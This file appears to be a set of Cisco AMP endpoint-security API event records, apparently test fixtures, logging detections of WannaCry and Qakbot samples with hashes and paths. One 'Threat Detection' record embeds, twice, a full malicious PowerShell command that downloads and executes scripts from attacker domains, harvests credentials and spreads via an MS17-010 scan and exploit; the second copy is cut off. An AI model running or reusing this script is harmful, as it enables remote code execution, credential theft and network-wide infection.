-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Quarantine","event_type_id":553648155,"detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
